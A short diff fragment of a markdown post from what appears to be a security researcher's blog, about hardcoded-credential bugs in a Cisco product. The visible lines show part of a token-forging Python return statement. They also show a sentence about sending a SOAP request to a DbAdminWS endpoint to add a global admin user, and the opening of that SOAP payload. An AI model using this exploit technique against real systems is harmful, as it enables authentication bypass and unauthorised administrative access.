sourceincite/sourceincite.github.io/_posts/0000-00-00-busting-ciscos-beans-hardcoding-your-way-to-hell.md

     return "%d.%d.%s.%s" % (sessionid, timestamp, base64.b64encode(md5.new(d).digest()), username)
 ```

-<p class="cn" markdown="1">Using this bug, we can send a SOAP request to the `/DbAdminWSService/DbAdminWS` endpoint and add a global admin user that will give us access to all interfaces!</p>
+Using this bug, we can send a SOAP request to the `/DbAdminWSService/DbAdminWS` endpoint and add a global admin user that will give us access to all interfaces!

 ```xml
 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ep="http://ep.san.jaxws.dcbu.cisco.com/">